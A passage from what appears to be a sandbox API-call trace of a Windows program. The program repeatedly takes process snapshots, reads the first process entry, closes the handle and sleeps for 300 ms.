th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.893] CloseHandle (hObject=0xbc) returned 1 [0153.893] Sleep (dwMilliseconds=0x12c) [0154.230] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0154.236] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.301] CloseHandle (hObject=0xc4) returned 1 [0154.301] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0154.308] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.363] CloseHandle (hObject=0xbc) returned 1 [0154.363] Sleep (dwMilliseconds=0x12c) [0154.668] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0154.674] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.720] CloseHandle (hObject=0xc4) returned 1 [0154.720] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0154.724] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.763] CloseHandle (hObject=0xbc) returned 1 [0154.763] Sleep (dwMilliseconds=0x12c) 
[0155.111] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0155.116] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.161] CloseHandle (hObject=0xc4) returned 1 [0155.161] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0155.166] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.208] CloseHandle (hObject=0xbc) returned 1 [0155.208] Sleep (dwMilliseconds=0x12c) [0155.510] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0155.515] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.552] CloseHandle (hObject=0xc4) returned 1 [0155.552] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0155.557] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.597] CloseHandle (hObject=0xbc) returned 1 [0155.597] Sleep (dwMilliseconds=0x12c) [0155.947] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0155.953] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.051] CloseHandle (hObject=0xc4) returned 1 [0156.051] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0156.058] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.125] CloseHandle (hObject=0xbc) returned 1 [0156.125] Sleep (dwMilliseconds=0x12c) [0156.446] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0156.453] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.489] CloseHandle (hObject=0xc4) returned 1 [0156.489] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0156.498] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.536] CloseHandle (hObject=0xbc) returned 1 [0156.536] Sleep (dwMilliseconds=0x12c) [0156.836] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0156.843] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.913] CloseHandle (hObject=0xc4) returned 1 [0156.913] CreateToolhelp32Snapshot (dwFlags=0xf, 
th32ProcessID=0x0) returned 0xbc [0156.919] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.975] CloseHandle (hObject=0xbc) returned 1 [0156.975] Sleep (dwMilliseconds=0x12c) [0157.304] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0157.311] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.364] CloseHandle (hObject=0xc4) returned 1 [0157.364] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0157.369] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.433] CloseHandle (hObject=0xbc) returned 1 [0157.434] Sleep (dwMilliseconds=0x12c) [0157.756] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0157.762] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.854] CloseHandle (hObject=0xc4) returned 1 [0157.854] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0157.859] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, 
pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.921] CloseHandle (hObject=0xbc) returned 1 [0157.921] Sleep (dwMilliseconds=0x12c) [0158.262] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0158.268] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.365] CloseHandle (hObject=0xc4) returned 1 [0158.365] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0158.371] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.439] CloseHandle (hObject=0xbc) returned 1 [0158.439] Sleep (dwMilliseconds=0x12c) [0158.817] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0158.824] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.863] CloseHandle (hObject=0xc4) returned 1 [0158.863] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0158.911] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.006] CloseHandle (hObject=0xbc) returned 1 [0159.006] Sleep (dwMilliseconds=0x12c) [0159.332] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 
[0159.339] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.467] CloseHandle (hObject=0xc4) returned 1 [0159.467] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0159.520] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.575] CloseHandle (hObject=0xbc) returned 1 [0159.575] Sleep (dwMilliseconds=0x12c) [0160.138] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0160.157] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.239] CloseHandle (hObject=0xc4) returned 1 [0160.239] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0160.245] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.342] CloseHandle (hObject=0xbc) returned 1 [0160.343] Sleep (dwMilliseconds=0x12c) [0160.968] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0160.989] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, 
szExeFile="[System Process]")) returned 1 [0161.565] CloseHandle (hObject=0xc4) returned 1 [0161.565] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0161.573] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.655] CloseHandle (hObject=0xbc) returned 1 [0161.656] Sleep (dwMilliseconds=0x12c) [0161.955] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0161.961] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.075] CloseHandle (hObject=0xc4) returned 1 [0162.075] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0162.080] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.238] CloseHandle (hObject=0xbc) returned 1 [0162.238] Sleep (dwMilliseconds=0x12c) [0162.679] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0162.685] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.821] CloseHandle (hObject=0xc4) returned 1 [0162.821] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0162.828] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.948] CloseHandle (hObject=0xbc) returned 1 [0162.948] Sleep (dwMilliseconds=0x12c) [0163.282] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0163.287] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.206] CloseHandle (hObject=0xc4) returned 1 [0164.206] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0164.211] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.732] CloseHandle (hObject=0xbc) returned 1 [0165.732] Sleep (dwMilliseconds=0x12c) [0167.363] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0167.370] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.580] CloseHandle (hObject=0xc4) returned 1 [0167.580] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0167.587] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.779] CloseHandle 
(hObject=0xbc) returned 1 [0167.779] Sleep (dwMilliseconds=0x12c) [0168.615] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0168.622] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.899] CloseHandle (hObject=0xc4) returned 1 [0168.899] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0168.952] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.182] CloseHandle (hObject=0xbc) returned 1 [0169.182] Sleep (dwMilliseconds=0x12c) [0169.666] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0169.675] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.945] CloseHandle (hObject=0xc4) returned 1 [0169.945] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0169.955] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.004] CloseHandle (hObject=0xbc) returned 1 [0172.004] Sleep (dwMilliseconds=0x12c) [0172.492] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0172.498] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.698] CloseHandle (hObject=0xc4) returned 1 [0172.698] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0172.703] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.800] CloseHandle (hObject=0xbc) returned 1 [0172.800] Sleep (dwMilliseconds=0x12c) [0173.152] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0173.157] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.308] CloseHandle (hObject=0xc4) returned 1 [0173.308] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0173.314] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.432] CloseHandle (hObject=0xbc) returned 1 [0173.432] Sleep (dwMilliseconds=0x12c) [0173.861] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0173.865] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.040] CloseHandle (hObject=0xc4) returned 1 [0174.040] 
CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0174.045] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.149] CloseHandle (hObject=0xbc) returned 1 [0174.149] Sleep (dwMilliseconds=0x12c) [0174.511] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0174.516] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.641] CloseHandle (hObject=0xc4) returned 1 [0174.641] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0174.646] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.717] CloseHandle (hObject=0xbc) returned 1 [0174.717] Sleep (dwMilliseconds=0x12c) [0175.072] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0175.078] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.168] CloseHandle (hObject=0xc4) returned 1 [0175.168] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0175.173] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.329] CloseHandle (hObject=0xbc) returned 1 [0175.329] Sleep (dwMilliseconds=0x12c) [0175.634] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0175.640] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.680] CloseHandle (hObject=0xc4) returned 1 [0175.680] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0175.685] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.724] CloseHandle (hObject=0xbc) returned 1 [0175.724] Sleep (dwMilliseconds=0x12c) [0176.024] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0176.029] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.103] CloseHandle (hObject=0xc4) returned 1 [0176.103] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0176.109] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.157] CloseHandle (hObject=0xbc) returned 1 [0176.158] Sleep (dwMilliseconds=0x12c) [0176.677] CreateToolhelp32Snapshot 
